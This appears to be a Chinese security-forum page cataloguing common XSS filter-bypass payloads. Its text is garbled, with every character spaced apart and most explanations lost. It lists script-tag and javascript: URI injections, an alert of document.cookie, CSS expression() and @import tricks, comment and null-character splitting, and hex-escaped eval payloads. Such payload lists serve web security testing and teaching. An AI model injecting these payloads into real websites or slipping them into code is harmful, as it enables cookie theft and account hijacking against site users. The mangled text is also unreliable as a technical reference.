[18451] 2018-08-23_技巧XSS的常见绕过方法

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2018-08-23_技巧XSS的常见绕过方法   |   X S S H A C K   H A C K   2 0 1 8 - 0 8 - 2 3 X S S < s c r i p t > a l e r t ( ' X S S   t e s t ' ) < / s c r i p t > < s c r i p t > a l e r t ( ' X S S   t e s t ' ) < / s c r i p t > < s c r i p t > a l e r t ( d o c u m e n t . c o o k i e ) < / s c r i p t > j a v a s c r i p t : a l e r t ( d o c u m e n t . c o o k i e ) ; < t e x t a r e a > e c h o   ' < t e x t a r e a > ' . $ a . " < / t e x t a r e a > " ;         < / t e x t a r e a > < s c r i p t > a l e r t ( " x x " ) < / s c r i p t > < t e x t a r e a > H T M L X S S   I E 6 < i m g   / > < t a b l e   b a c k g r o u n d = " j a v a s c r i p t : a l e r t ( ' x s s ' ) " > < / t a b l e > < a   h r e f = " j a v a s c r i p t : a l e r t ( ' x s s ' ) " > < / a > T A B < i m g   s r c   =   " j a v a   s c r i p t : a l e r t ( ' x s s ' ) " >       T A B < i m g   / > v a s c r i p t : a l e r t ( ' x s s ' ) " >     A S C I I < i m g   >   i a s c i i & # 1 0 5   H T M L
H T M L X S S < i m g   >   s r c   o n e r r o r       @ m 0 1 l y m 0 o n   C S S < d i v   s t y l e = " b a c k g r o u n d - i m a g e : u r l ( j a v a s c r i p t : a l e r t ( ' s s s ' ) ) " > < s t y l e > b o d y { b a c k g r o u n d - i m a g e : u r l ( j a v a s c r i p t : a l e r t ( ' s a a a ' ) ) }   ; < / s t y l e > < i m g   s t y l e = " x s s : e x p r e s s i o n ( a l e r t ( ' s s s s ' ) ) " > s t y l e < d i v   s t y l e = " l i s t - s t y l e - i m a g e : u r l ( j a v a s c r i p t : a l e r t ( ' x x x ' ) ) " > < i m g   s t y l e   = " b a c k g r o u n d - i m a g e : u r l ( j a v a s c r i p t : a l e r t ( ' s s s ' ) ) " > X S S C S S w w w . x x x . c o m / 1 . c s s l i n k p {           b a c k g r o u n d - i m a g e : e x p r e s s i o n ( a l e r t ( ' x s s ' ) ) } l i n k < l i n k   r e l = " s t y l e s h e e t "   h r e f = " w w w . x x x . c o m / 1 . c s s " > @ i m p o r t j a v a s c r i p t < s t y l e > @ i m p o r t   j a v a s c r i p t : a l e r t ( ' s s s ' ) ; < / s t y l e > < i m g   > < i m g / > < d i v   s t y l e = " l e f t : e x p r e s i o n ( a l e r t ( ' x x ' ) ) " > / * * / , 0 < i m g   s t / * * / s r c   = " j a v a s c r i p t : a l e r t ( ' s s s a ' ) " > < s t y l e > @ i 0 m p o r t   " j a v a s c r i p t : a l e r 0 t ( ' s s s ' ) " ; < / s t y l e >
< i m g   >     1 0 < i m g   >           1 6 < s c r i p t > e v a l ( " a l e r t ( ' x a a a ' ) " ) < / s c r i p t >     e v a l j s < s c r i p t > e v a l ( " x 6 1 x 6 c x 6 5 x 7 2 x 7 4 x 2 8 x 2 7 x 7 8 x 7 8 x 7 8 x 7 8 x 2 7 x 2 9 " ) < / s c r i p t >     1 6 e v a l < i m g   >               e v a l ( ) S t r i n g . f r o m C h a r C o d e ( ) 1 0         < s c r i p t > z = ' j a v a s c r i p t : ' < / s c r i p t >         < s c r i p t > z = z + ' a l e r t ( / x x s s / ) ' < / s c r i p t >         < s c r i p t > e v a l ( z ) < / s c r i p t >         - - - - - - - - - - - - - - - - - - - - - - - - - X S S
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则